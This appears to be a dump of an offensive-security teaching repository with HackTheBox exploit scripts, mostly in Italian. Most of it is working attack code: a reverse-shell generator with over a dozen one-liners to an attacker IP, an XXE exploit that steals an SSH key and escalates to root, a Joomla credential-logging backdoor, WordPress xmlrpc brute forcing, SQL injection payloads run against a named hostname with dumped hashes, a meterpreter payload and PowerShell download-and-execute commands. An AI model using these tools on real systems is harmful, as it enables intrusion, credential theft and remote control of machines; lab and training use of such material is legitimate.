├── HackTheBox
    ├── readme
    ├── 78-Aragog-expl.sh
    ├── htb-node-enumerate.sh
    └── 78-Aragog-full.py
├── Binary
    ├── power
    ├── sploit.py
    ├── power.py
    └── pattern.py
├── Rev3rseSecurity2019.pps
├── README.md
├── Joomla_Backdoor
├── wordpress_md5sha_coverter.php
├── Telegram python bot.txt
├── sender.py
├── upload.php
├── rec.py
├── Second_Order_SQL_injection.txt
├── railgun.txt
├── trasfer file.txt
├── shell.py
├── wordpress_bf_amplification.py
├── sqli.txt
├── nca.sh
└── Start-WebServer.ps1


/HackTheBox/readme:
--------------------------------------------------------------------------------
1 | Repository scripts usati per le VM di HackTheBox
2 | 


--------------------------------------------------------------------------------
/Binary/power:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Rev3rseSecurity/Material/HEAD/Binary/power


--------------------------------------------------------------------------------
/Rev3rseSecurity2019.pps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Rev3rseSecurity/Material/HEAD/Rev3rseSecurity2019.pps


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Material
2 | Collections of tools, scripts, snippets and so on, used in Rev3rse Security Live
3 | 


--------------------------------------------------------------------------------
/Joomla_Backdoor:
--------------------------------------------------------------------------------
1 | if(isset($_POST['username'])) {
2 |   file_put_contents('/tmp/backdoor.log', $_POST['username'].' / '.$_POST['passwd'], FILE_APPEND);
3 | }
4 | 


--------------------------------------------------------------------------------
/wordpress_md5sha_coverter.php:
--------------------------------------------------------------------------------
1 | <?php
2 | //usage: cat rockyou.txt | php thiscript.php > rockyou_sha_md5.txt
3 | 
4 | while($f = fgets(STDIN){
5 | 	$passwenc = md5(sha1(rtrim($f)));
6 | 	echo "$passwenc : $f";
7 | }
8 | 
9 | ?>


--------------------------------------------------------------------------------
/Binary/sploit.py:
--------------------------------------------------------------------------------
 1 | import os, sys
 2 | 
 3 | def show_error(msg):
 4 | 	sys.stderr.write(os.linesep * 2 + "ERROR: " + msg + os.linesep * 3)
 5 | 	sys.exit(1)
 6 | 
 7 | def bare_words():
 8 | 	string = " ".join(sys.argv[1:])
 9 | 	print "The used string: =>" + string + "<="
10 | 	return string
11 | 


--------------------------------------------------------------------------------
/Telegram python bot.txt:
--------------------------------------------------------------------------------
 1 | https://api.telegram.org/bot<YourBOTToken>/getUpdates
 2 | 
 3 | token: 
 4 | 
 5 | chatid: 
 6 | 
 7 | 
 8 | 
 9 | 
10 | 
11 | #!/usr/bin/python
12 | import requests,telegram
13 | 
14 | token = ""
15 | chat_id = ""
16 | 
17 | a = "Messaggio di test da KNX"
18 | 
19 | bot = telegram.Bot(token=token)
20 | bot.sendMessage(chat_id=chat_id, text=a)
21 | 
22 | 


--------------------------------------------------------------------------------
/HackTheBox/78-Aragog-expl.sh:
--------------------------------------------------------------------------------
1 | ssh florian@10.10.10.78 -i $(curl -X POST http://10.10.10.78/hosts.php -d '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE details [<!ELEMENT subnet_mask ANY ><!ENTITY xxe SYSTEM "file:///home/florian/.ssh/id_rsa" >]><details><subnet_mask>&xxe;</subnet_mask><test></test></details>' -s > id_rsa && sed -i 's/There are 4294967294 possible hosts for //g' id_rsa && chmod 600 id_rsa &&ls id_rsa) 'echo -e "USER:" $(cat user.txt)\n'
2 | 


--------------------------------------------------------------------------------
/sender.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | from socket import *
 4 | import sys
 5 | 
 6 | s = socket(AF_INET,SOCK_DGRAM)
 7 | host =sys.argv[1]
 8 | port = 9999
 9 | buf =1024
10 | addr = (host,port)
11 | 
12 | file_name=sys.argv[2]
13 | 
14 | s.sendto(file_name,addr)
15 | 
16 | f=open(file_name,"rb")
17 | data = f.read(buf)
18 | while (data):
19 |     if(s.sendto(data,addr)):
20 |         print "sending ..."
21 |         data = f.read(buf)
22 | s.close()
23 | f.close()
24 | 


--------------------------------------------------------------------------------
/upload.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | if (isset($_POST['submit'])){
 3 | if($_FILES["file"]["error"]) {
 4 | echo "errore nel caricamento del file!!";
 5 | exit();
 6 | }
 7 | else
 8 | {
 9 | move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
10 | echo "hai caricato il tuo file in: " .$_FILES['file']['name'];
11 | }
12 | }
13 | ?>
14 | <html><form action="" method="post" enctype="multipart/form-data"><input type="file" name="file"><input type="submit" name="submit" value="Upload"></form></html>


--------------------------------------------------------------------------------
/rec.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | from socket import *
 4 | import sys
 5 | import select
 6 | 
 7 | host="0.0.0.0"
 8 | port = 9999
 9 | s = socket(AF_INET,SOCK_DGRAM)
10 | s.bind((host,port))
11 | 
12 | addr = (host,port)
13 | buf=1024
14 | 
15 | data,addr = s.recvfrom(buf)
16 | print "Received File:",data.strip()
17 | f = open("file_ricevuto",'wb')
18 | 
19 | data,addr = s.recvfrom(buf)
20 | try:
21 |     while(data):
22 |         f.write(data)
23 |         s.settimeout(2)
24 |         data,addr = s.recvfrom(buf)
25 | except timeout:
26 |     f.close()
27 |     s.close()
28 |     print "File Downloaded"


--------------------------------------------------------------------------------
/Second_Order_SQL_injection.txt:
--------------------------------------------------------------------------------
 1 | '
 2 | 
 3 | a'or 'a'='a -- -
 4 | 
 5 | aa' union select 1,2 -- -
 6 | 
 7 | aa') union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),2-- -
 8 | 
 9 | aa') union select (select group_concat(column_name) from information_schema.columns where table_name="users"),2-- -
10 | 
11 | aa') union select group_concat(id,username,0x3a,password),2 from users-- -
12 | 
13 | aa') union select group_concat(schema_name),2 from information_schema.schemata-- -
14 | 
15 | OR
16 | 
17 | aa') union select table_schema, table_name FROM information_schema.tables-- -
18 | 
19 | aa') union select 1,group_concat(username,0x3a,password) from sysadmin.users-- -
20 | 
21 | 
22 | 
23 | 
24 | 
25 | 


--------------------------------------------------------------------------------
/railgun.txt:
--------------------------------------------------------------------------------
 1 | https://www.defcon.org/images/defcon-20/dc-20-presentations/Maloney/DEFCON-20-Maloney-Railgun.pdf
 2 | https://www.youtube.com/watch?v=mt2JoYkhmOA
 3 | https://docs.microsoft.com/en-us/windows/desktop/api/lmaccess/nf-lmaccess-netuserchangepassword
 4 | 
 5 | msfconsole
 6 | use exploit/multi/handler
 7 | set payload windows/meterpreter/reverse_tcp
 8 | set lport 8888
 9 | ser rhost x.x.x.x
10 | 
11 | 
12 | msfvenom -p windows/meterpreter/reverse_tcp PORT=8888 -f exe > knx.exe
13 | knx.exe
14 | 
15 | irb
16 | session.railgun
17 | session.railgun.known_dll_names
18 | session.railgun.<dllname>.functions
19 | session.railgun.user32.functions.each_pair {|n, v| puts "Function name: #{n}, Returns: #{v.return_type}, Params: #{v.params}"}
20 | 
21 | session.railgun.user32.MessageBoxA(0, "hello, world", "hello", "MB_OK")
22 | 
23 | 
24 | ESERCIZIO X CASA:
25 | client.railgun.user32.LockWorkStation()
26 | session.railgun.netapi32.NetUserChangePassword("dominio", "utente", "password_Attuale", "password_nuova")
27 | 


--------------------------------------------------------------------------------
/Binary/power.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | context.clear(arch="amd64")
 4 | LOCATION = "./power"            # position of the binary
 5 | LIBC_LOC = "./libc.so.6"        # position of libc
 6 | binary = ELF(LOCATION)          # create object with data from the binary
 7 | libc   = ELF(LIBC_LOC)          # create object with data from the libc
 8 | r = process(LOCATION)           # establish connection with the binary
 9 | 
10 | rop = ROP(LOCATION)
11 | 
12 | def exploit():
13 |     r.recvuntil(":")
14 |     r.sendline("yes")
15 |     r.recv()
16 |     r.recvuntil("you ")
17 | 
18 |     libcSystem = int(r.recv(14), base=16)
19 |     log.info("Address of system() in libc is {0}".format(hex(libcSystem)))
20 | 
21 |     r.recvuntil(":")
22 |     
23 |     relative_system = libc.symbols["system"]
24 |     log.info("Relative address of system() is {0}".format(hex(relative_system)))
25 |     
26 |     libc.address = libcSystem - relative_system
27 |     log.info("Address of libc is {0}".format(hex(libc.address)))
28 |     
29 |     one_gadget = 0x45216 
30 |     log.info("Gadget at {0}" .format(one_gadget))
31 |    
32 |     r.send(p64(one_gadget + libc.address))
33 |     r.interactive()
34 | 
35 | exploit()
36 | 


--------------------------------------------------------------------------------
/HackTheBox/htb-node-enumerate.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Usage: ./htb-node-enumerate.sh r
 4 | 
 5 | chars='qwertyuiopasdfghjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM$'
 6 | 
 7 | function getchar() {
 8 | 	for (( i=0; i<${#chars}; i++ )); do
 9 | 
10 | 		if [ -z $2 ]; then
11 | 			echo "trying $1${chars:$i:1}..."
12 | 		else
13 | 			echo -en "\033[99D\033[KChecking for $1${chars:$i:1}" 1>&2
14 | 		fi
15 | 
16 | 		CHN=$(curl -s -H 'Content-Type: application/json;charset=utf-8' -d '{"username":{"$regex":"^'$1${chars:$i:1}'"},"password":"asdasd"}' 10.10.10.58:3000/api/session/authenticate | grep 'success' | wc -l)
17 | 		if [ $CHN -gt 0 ]; then
18 | 			if [ -z $2 ]; then
19 | 				echo "+--> Found: "$1${chars:$i:1}
20 | 			else
21 | 				echo -en "\033[999D\033[K\r" 1>&2
22 | 				echo $1${chars:$i:1}
23 | 				break
24 | 			fi
25 | 		fi
26 | 	done
27 | }
28 | 
29 | if [ -z $1 ]; then
30 | 	getchar '^'${chars:$a:1}
31 | else
32 | 	CHECK=${1}
33 | 	for (( a=0; a<=100; a++ )); do
34 | 		echo -en "\033[99D\033[KChecking for ${CHECK}"
35 | 		RES=$(getchar ${CHECK} s)
36 | 		if [ "${RES: -1}" != '$' ]; then
37 | 			CHECK=$RES
38 | 		else
39 | 			RES=$(getchar ${CHECK}'$' s)
40 | 			echo "+--> Found: ${1}${RES:1: -2}"
41 | 			exit
42 | 		fi
43 | 	done
44 | fi
45 | 


--------------------------------------------------------------------------------
/trasfer file.txt:
--------------------------------------------------------------------------------
 1 | --=[ trasferimenti file ]=--
 2 | 
 3 | netcat
 4 | nc -lvvp 8888 > file.ext
 5 | cat file.ext | nc IP 8888
 6 | 
 7 | base64
 8 | base64 file
 9 | base64 -w 0
10 | base64 -d file
11 | 
12 | python script
13 | send.py
14 | rec.py
15 | 
16 | python simplehttpserver
17 | python -m SimpleHTTPServer 80
18 | 
19 | python ftpserver
20 | python -m pyftpdlib -p21 -w
21 | 
22 | php webserver
23 | php -S 0.0.0.0:80
24 | 
25 | ruby
26 | ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
27 | 
28 | upload file php
29 | upload.php 
30 | 
31 | hfs
32 | hfs.exe 
33 | 
34 | powershell
35 | PS C:\> $webclient = New-Object System.Net.WebClient
36 | PS C:\> $payload_url = "https://attacker_host/payload.exe"
37 | PS C:\> $file = “C:\ProgramData\payload.exe"
38 | PS C:\> $webclient.DownloadFile($payload_url,$file)
39 | 
40 | IEX($browser.DownloadString("http://IP/PowerView.ps1"))
41 | 
42 | powershell -nop -c "$r=New-Object System.Net.WebClient;$r.DownloadFile('http://IP/knx.exe', 'c:\users\knx.exe)"
43 | 
44 | powershell IEX (Invoke-WebRequest -Uri "http://IP/knx.exe" -outfile "c:\users\knx.exe")
45 | 
46 | webserver.ps1:  https://gallery.technet.microsoft.com/scriptcenter/Powershell-Webserver-74dcf466
47 | 
48 | simplehttpserver: https://gist.github.com/zhilich/b8480f1d22f9b15d4fdde07ddc6fa4ed
49 | 
50 | ESERCIZIO PER CASA:
51 | socat trasfer file


--------------------------------------------------------------------------------
/HackTheBox/78-Aragog-full.py:
--------------------------------------------------------------------------------
 1 | import requests,os,paramiko
 2 | from pwn import *
 3 | 
 4 | server = "10.10.10.78"
 5 | url = "http://10.10.10.78/hosts.php"
 6 | 
 7 | xxe = """<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE details [<!ELEMENT subnet_mask ANY ><!ENTITY xxe SYSTEM "file:///home/florian/.ssh/id_rsa" >]><details><subnet_mask>&xxe;</subnet_mask><test></test></details>"""
 8 | 
 9 | log.info("Exploit Started")
10 | log.info("Get florian ssh id_rsa through XXE") 
11 | r = requests.post(url, data=xxe)
12 | res = r.text
13 | 
14 | key = res[42:] 
15 | 
16 | print key
17 | 
18 | log.info("Write to disk id_rsa and set proper permissions")
19 | f = open("/tmp/id_rsa", 'w')
20 | f.write(key)
21 | f.close()
22 | 
23 | os.system("chmod 600 /tmp/id_rsa")
24 | 
25 | log.info("Connect ssh as florian user")
26 | ssh = paramiko.SSHClient()
27 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
28 | ssh.connect(server, username='florian', key_filename='/tmp/id_rsa')
29 | stdin, stdout, stderr = ssh.exec_command("cat user.txt")
30 | log.info("Reading User flag")
31 | log.success("USER: %s" %str(stdout.read()))
32 | 
33 | log.info("Tricks backup cronscript with symlink")
34 | stdin, stdout, stderr = ssh.exec_command("rm -rf /var/www/html/dev_wiki && rm /var/www/html/zz_backup && ln -s /root /var/www/html/zz_backup && mkdir /var/www/html/dev_wiki && sleep 300 && cat /var/www/html/dev_wiki/root.txt")
35 | log.info("Reading Root flag")
36 | log.success("ROOT: %s" %str(stdout.read()))
37 | 
38 | 


--------------------------------------------------------------------------------
/shell.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import sys
 4 | from pwn import *
 5 | 
 6 | if len(sys.argv) != 3:
 7 |      sys.stderr.write('[*] Usage: ' + sys.argv[0]+ ' IP PORT\n')
 8 |      sys.exit(1)
 9 | 
10 | IP = sys.argv[1]
11 | PORT = sys.argv[2]
12 | 
13 | a = "socat TCP4:%s:%s EXEC:bash,pty,stderr,setsid,sigint,sane" %(IP,PORT)
14 | b = "perl -e 'use Socket;$i=\"%s\";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'" %(IP,PORT)
15 | c = "php -r '$sock=fsockopen(\"%s\",%s);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" %(IP,PORT)
16 | d = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" %(IP,PORT)
17 | e = "nc -e /bin/sh %s %s" %(IP,PORT)
18 | f = "bash -i >& /dev/tcp/%s/%s 0>&1" %(IP,PORT)
19 | g = "127.0.0.1;bash -i >& /dev/tcp/%s/%s 0>&1" %(IP,PORT)
20 | h = "/bin /telnet %s 80 | /bin/bash | /bin/telnet %s 25" %(IP,IP)
21 | i = "mknod backpipe p && telnet %s %s 0<backpipe | /bin/bash 1>backpipe" %(IP,PORT)
22 | l = "mknod /var/tmp/fgp p ; /bin/sh 0</var/tmp/fgp |nc %s %s 1>/var/tmp/fgp" %(IP,PORT)
23 | m = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %s >/tmp/f " %(IP,PORT)
24 | n = "ruby -rsocket -e'f=TCPSocket.open(\"%s\",%s).to_i;exec slog.infof(\"/bin/sh -i <&%%d >&%%d 2>&%%d\",f,f,f)'" %(IP,PORT)
25 | o = "exec 5<>/dev/tcp/%s/%s; while read line 0<&5; do $line 2>&5 >&5; done" %(IP,PORT)
26 | p = "mknod /var/tmp/fgp p ; /bin/sh 0</var/tmp/fgp |nc %s %s 1>/var/tmp/fgp" %(IP,PORT)
27 | 
28 | log.success("Reverse Shell:")
29 | 
30 | for i in (a,b,c,d,e,f,g,h,i,l,m,n,o,p):
31 |    log.info(i)
32 | 
33 | print ""
34 | log.success("Spawn shell:")
35 | log.info("python -c 'import pty;pty.spawn(\"/bin/bash\")")
36 | log.info("export XTERM=xterm")
37 | 


--------------------------------------------------------------------------------
/wordpress_bf_amplification.py:
--------------------------------------------------------------------------------
 1 | import requests,sys,re,time
 2 | from xml.sax.saxutils import escape
 3 | 
 4 | username = sys.argv[1]
 5 | 
 6 | class col:
 7 |     green = '\033[92m'
 8 |     red   = '\033[91m'
 9 |     e     = '\033[0m'
10 | 
11 | def bfampxml(start):
12 |     res = {'pw':{}, 'xml':''}
13 | 
14 |     xmlhead = '''
15 |     <?xml version="1.0"?>
16 |     <methodCall>
17 |     <methodName>system.multicall</methodName>
18 |     <params><param><value><array><data>
19 |     '''
20 | 
21 |     xmlbody = ''
22 |     c = 0
23 |     n = 0
24 |     with open('fsocity.dic') as f:
25 |         for line in f:
26 |             if n < start:
27 |                 n=(n+1)
28 |                 continue
29 | 
30 |             c = (c + 1)
31 |             #sys.stdout.write(' - import password from dict: ['+str(c)+']      \r')
32 |             if line.strip() != '' and c <= 1000:
33 |                 sys.stdout.write(' - Import password from dict: ['+str(c)+']      \r')
34 |                 xmlbody += '''
35 | 	        <value><struct>
36 | 	        <member><name>methodName</name>
37 | 	        <value><string>wp.getUsersBlogs</string></value>
38 | 	        </member>
39 | 
40 | 	        <member><name>params</name><value><array><data><value><array><data>
41 | 		    <value><string>'''+username+'''</string></value>
42 | 		    <value><string>'''+escape(line.strip())+'''</string></value>
43 | 	        </data></array></value></data></array></value></member>
44 | 	        </struct></value> 
45 |                 '''
46 |                 #break
47 |                 res['pw'][c] = line.strip()
48 |                 time.sleep(0.0005)
49 | 
50 |     xmlend = '''
51 |       </data></array></value>
52 |       </param>
53 |     </params>
54 |     </methodCall>
55 |     '''
56 |     sys.stdout.write('\n')
57 |     res['xml'] = xmlhead+xmlbody+xmlend
58 | 
59 |     return res
60 | 
61 | 
62 | for i in range(1,12):
63 |     print 'Request '+str(i)+':'
64 |     x = bfampxml(i*1000)
65 |     r = requests.post('http://192.168.1.4/xmlrpc.php', headers={'Content-Type':'text/xml; charset=UTF-8'}, data=x['xml'])
66 |     print ' - Response status: '+str(r.status_code)
67 |     l = r.text.splitlines()
68 |     count = 1
69 | 
70 |     print ' - Response body:'
71 |     for line in l:
72 |         if re.search('faultString.*Incorrect', line):
73 |             #print sys.argv[1]+'/'+x['pw'][count]+': Incorrect username or password'
74 |             count=(count+1)
75 |         else:
76 |             if re.search('isAdmin.*boolean.*', line):
77 |                 print '   - !! found user: '+col.green+sys.argv[1]+col.e+' / pass: '+col.green+x['pw'][count]+col.e+' :)'
78 |                 print 'done.\n'
79 |                 sys.exit()
80 |     print '   - '+col.red+'no valid username / password found'+col.e


--------------------------------------------------------------------------------
/sqli.txt:
--------------------------------------------------------------------------------
 1 | aa@yy.uu' or 1=1 limit 0,1 -- -  						Email sent to: test1@aa.com=>test1 
 2 | aa@yy.uu' or 1=1 limit 0,2 -- -							User not found with that email! 
 3 | aa@yy.uu' or 1=1 limit 1,0 -- -							User not found with that email!
 4 | aa@yy.uu' or 1=1 limit 1,1 -- -							Email sent to: test2@aa.com=>test2 
 5 | aa@yy.uu' or 1=1 limit 2,1 -- -							Email sent to: test3@aa.com=>test3 
 6 | aa@yy.uu' or 1=1 limit 3,1 -- -							Email sent to: test4@aa.com=>test4 
 7 | aa@yy.uu' or 1=1 limit 4,1 -- -							Email sent to: test5@aa.com=>test5 
 8 | aa@yy.uu' or 1=1 limit 5,1 -- -							Email sent to: test6@aa.com=>test6 
 9 | aa@yy.uu' or 1=1 limit 6,1 -- -							Email sent to: test7@aa.com=>test7
10 | aa@yy.uu' or 1=1 limit 7,1 -- -							Email sent to: test8@aa.com=>test8
11 | aa@yy.uu' or 1=1 limit 8,1 -- -							Email sent to: test9@aa.com=>test9
12 | .
13 | .
14 | .
15 | for i in `seq 1 100`; do curl http://decoderit.hopto.org/cmsdata/forgot.php -d "email=aa@yy.uu' or 1=1 limit $i,1 -- -"; done
16 | .
17 | .
18 | aa@yy.uu' or 1=1 limit 100,1 -- -						Email sent to: test101@aa.com=>test101		
19 | 
20 | for i in `seq 180 250`; do curl http://decoderit.hopto.org/cmsdata/forgot.php -d "email=aa@yy.uu' or 1=1 limit $i,1 -- -" -s|grep to:; done
21 | 
22 | 
23 | Email sent to: test200@aa.com=>test200    
24 | Email sent to: adm@nowhere.com=>super_cms_adm    
25 | Email sent to: decoder@nowhere.com=>decoder    
26 | 				
27 | 
28 | aa@jjj.com' UnIon SelEct '1@a.com',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'2@a.com','3@a.com' -- -  
29 | groups,license,operators 
30 | 
31 | aa@jjj.com' UnIon SelEct '1@a.com',(select group_concat(column_name) from information_schema.columns where table_name="groups"),'2@a.com','3@a.com' -- -
32 | grpid,userid 
33 | 
34 | aa@jjj.com' UnIon SelEct '1@a.com',(select group_concat(column_name) from information_schema.columns where table_name="license"),'2@a.com','3@a.com' -- -
35 | id,license_key
36 | 
37 | aa@jjj.com' UnIon SelEct '1@a.com',(select group_concat(column_name) from information_schema.columns where table_name="operators"),'2@a.com','3@a.com' -- -
38 | id,__username_,__password_,email 
39 | 
40 | aa@jjj.com' UnIon SelEct '1@a.com',group_concat(__username_,0x3a,__password_,0x3a,email),'2@a.com','3@a.com' from operators -- -
41 | test1:5f4dcc3b5aa765d61d8327deb882cf99:test1@aa.com
42 | test2:5f4dcc3b5aa765d61d8327deb882cf99:test2@aa.com
43 | test3:5f4dcc3b5aa765d61d8327deb882cf99:test3@aa.com
44 | test4:5f4dcc3b5aa765d61d8327deb882cf99:test4@aa.com
45 | test5:5f4dcc3b5aa765d61d8327deb882cf99:test5@aa.com
46 | test6:5f4dcc3b5aa765d61d8327deb882cf99:test6@aa.com
47 | test7:5f4dcc3b5aa765d61d8327deb882cf99:test7@aa.com
48 | test8:5f4dcc3b5aa765d61d8327deb882cf99:test8@aa.com
49 | test9:5f4dcc3b5aa765d61d8327deb882cf99:test9@aa.com
50 | test10:5f4dcc3b5aa765d61d8327deb882cf99:test10@aa.com
51 | test11:5f4dcc3b5aa765d61d8327deb882cf99:test11@aa.com
52 | test12:5f4dcc3b5aa765d61d8327deb882cf99:test12@aa.com
53 | test13:5f4dcc3b5aa765d61d8327deb882cf99:test13@aa.com
54 | test14:5f4dcc3b5aa765d61d8327deb882cf99:test14@aa.com
55 | test15:5f4dcc3b5aa765d61d8327deb882cf99:test15@aa.com
56 | test16:5f4dcc3b5aa765d61d8327deb882cf99:test16@aa.com
57 | test17:5f4dcc3b5aa765d61d8327deb882cf99:test17@aa.com
58 | test18:5f4dcc3b5aa765d61d8327deb882cf99:test18@aa.com
59 | test19:5f4dcc3b5aa765d61d8327deb882cf99:test19@aa.com
60 | test20:5f4dcc3b5
61 | 
62 | aa@jjj.com' UnIon SelEct '1@a.com',group_concat(id,__username_,0x3a,__password_,0x3a,email),'2@a.com','3@a.com' from operators where id > 199 -- -
63 | 350test1:5f4dcc3b5aa765d61d8327deb882cf99:test1@aa.com
64 | 351test2:5f4dcc3b5aa765d61d8327deb882cf99:test2@aa.com
65 | 352test3:5f4dcc3b5aa765d61d8327deb882cf99:test3@aa.com
66 | 353test4:5f4dcc3b5aa765d61d8327deb882cf99:test4@aa.com
67 | 354test5:5f4dcc3b5aa765d61d8327deb882cf99:test5@aa.com
68 | 355test6:5f4dcc3b5aa765d61d8327deb882cf99:test6@aa.com
69 | 356test7:5f4dcc3b5aa765d61d8327deb882cf99:test7@aa.com
70 | 357test8:5f4dcc3b5aa765d61d8327deb882cf99:test8@aa.com
71 | 358test9:5f4dcc3b5aa765d61d8327deb882cf99:test9@aa.com
72 | 359test10:5f4dcc3b5aa765d61d8327deb882cf99:test10@aa.com
73 | 360test11:5f4dcc3b5aa765d61d8327deb882cf99:test11@aa.com
74 | 361test12:5f4dcc3b5aa765d61d8327deb882cf99:test12@aa.com
75 | 362test13:5f4dcc3b5aa765d61d8327deb882cf99:test13@aa.com
76 | 363test14:5f4dcc3b5aa765d61d8327deb882cf99:test14@aa.com
77 | 364test15:5f4dcc3b5aa765d61d8327deb882cf99:test15@aa.com
78 | 365test16:5f4dcc3b5aa765d61d8327deb882cf99:test16@aa.com
79 | 366test17:5f4dcc3b5aa765d61d8327deb882cf99:test17@aa.com
80 | 367test18:5f4dcc3b5aa765d61d8327deb882cf99:test18@aa.com
81 | 368test19:5f4dcc
82 | 
83 | aa@jjj.com' UnIon SelEct '1@a.com',group_concat(id,__username_,0x3a,__password_,0x3a,email),'2@a.com','3@a.com' from operators where id > 545 -- -
84 | 546test197:5f4dcc3b5aa765d61d8327deb882cf99:test197@aa.com
85 | 547test198:5f4dcc3b5aa765d61d8327deb882cf99:test198@aa.com
86 | 548test199:5f4dcc3b5aa765d61d8327deb882cf99:test199@aa.com
87 | 549test200:5f4dcc3b5aa765d61d8327deb882cf99:test200@aa.com
88 | 550super_cms_adm:0b0689ba94f94533400f4decd87fa260:adm@nowhere.com ** tamarro **
89 | 551decoder:5f4dcc3b5aa765d61d8327deb882cf99:decoder@nowhere.com  ** password **
90 | 
91 | 


--------------------------------------------------------------------------------
/nca.sh:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/expect
  2 | # nca - nc wrapper by SNADO team
  3 | # Requires: expect, nc and optionally tmux
  4 | 
  5 | set LISTEN false
  6 | set ADDR "0.0.0.0"
  7 | set PORT 0
  8 | set TMUX false
  9 | 
 10 | set argsCount [llength $argv];
 11 | set i 0
 12 | while { $i < $argsCount } {
 13 |     switch [lindex $argv $i] {
 14 | 		"-l" {
 15 | 			set LISTEN true
 16 | 		}
 17 | 		"-t" {
 18 | 			set TMUX true
 19 | 		}
 20 | 		default {
 21 | 			if { $i == $argsCount-2 } {
 22 | 				set ADDR [lindex $argv $i]
 23 | 			} else {
 24 | 				set PORT [lindex $argv $i]
 25 | 			}
 26 | 		}
 27 | 	}
 28 |     set i [expr $i+1];
 29 | }
 30 | 
 31 | if { $PORT > 0 && ($LISTEN == true || $ADDR != "0.0.0.0") } {
 32 | 
 33 | 	if { $LISTEN == true } {
 34 | 		if { $ADDR == "0.0.0.0" } {
 35 | 			set CMD "(nc -lvp $PORT; echo -e '\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3')"
 36 | 		} else {
 37 | 			set CMD "(nc -lvp $PORT -s $ADDR; echo -e '\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3')"
 38 | 		}
 39 | 		set MSG "\[\033\[94m*\033\[0m\] Waiting for connections on $ADDR:$PORT"
 40 | 		set EXP "onnect"
 41 | 	} else {
 42 | 		set CMD "(nc -v $ADDR $PORT; echo -e '\xf5\xe7\xf3\xf5\xe7\xf3\xf5''\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3')"
 43 | 		#set CMD "($arg3 nc -v $ADDR $PORT; echo -e '\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3')"
 44 | 		set MSG "\[\033\[94m*\033\[0m\] Connecting to $ADDR:$PORT"
 45 | 		set EXP "open"
 46 | 	}
 47 | 
 48 | 	log_user 0
 49 | 	set timeout -1
 50 | 	
 51 | 	spawn "/bin/bash"
 52 | 	send "$CMD\n"
 53 | 	puts $MSG
 54 | 
 55 | 	expect {
 56 | 		$EXP {
 57 | 			puts "\[\033\[92m+\033\[0m\] Connected"
 58 | 			
 59 | 			send "echo 'un''ix'\n"
 60 | 			sleep 0.2
 61 | 			expect {
 62 | 				"unix" {
 63 | 					puts "\[\033\[92m+\033\[0m\] Unix detected"
 64 | 					
 65 | 					if { $LISTEN == true && $TMUX == true } {
 66 | 						send \x1A
 67 | 						if { $ADDR != "0.0.0.0" } {
 68 | 							send "tmux new-window -d '$::argv0 -l -t $ADDR $PORT'\n"
 69 | 						} else {
 70 | 							send "tmux new-window -d '$::argv0 -l -t $PORT'\n"
 71 | 						}
 72 | 						send "fg\n"
 73 | 					}
 74 | 				}
 75 | 				"'un''ix'" {
 76 | 					puts "\[\033\[92m+\033\[0m\] Windows detected"
 77 | 					
 78 | 					if { $LISTEN == true && $TMUX == true } {
 79 | 						send \x1A
 80 | 						if { $ADDR != "0.0.0.0" } {
 81 | 							send "tmux new-window -d '$::argv0 -l -t $ADDR $PORT'\n"
 82 | 						} else {
 83 | 							send "tmux new-window -d '$::argv0 -l -t $PORT'\n"
 84 | 						}
 85 | 						send "fg\n"
 86 | 						
 87 | 						expect ")"
 88 | 						expect ")"
 89 | 						expect ")"
 90 | 					}
 91 | 										
 92 | 					send "\n"
 93 | 					interact -o "\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3" return
 94 | 					
 95 | 					puts ""
 96 | 					puts "\[\033\[94m*\033\[0m\] Terminated"
 97 | 					exit
 98 | 				}
 99 | 			}
100 | 			send "unset HISTFILE\n"
101 | 			send "p=`which python python2 python3 python2.7 python3.5 python2.6 python3.4 python3.6 | xargs | cut -d ' ' -f 1`;if \[ ! -z \$p \]; then echo 'P''YTHON-OK'; \$p -c 'import pty;pty.spawn(\"/bin/bash\")'; else echo 'P''YTHON-ERR'; fi\n"
102 | 			expect {
103 | 				"PYTHON-OK" {
104 | 					set ROWS [exec tput lines]
105 | 					set COLS [exec tput cols]
106 | 					puts "\[\033\[92m+\033\[0m\] python found"
107 | 					expect {
108 | 						"$ " {
109 | 						}
110 | 						"# " {
111 | 						}
112 | 						"% " {
113 | 						}
114 | 					}
115 | 					send \x1A
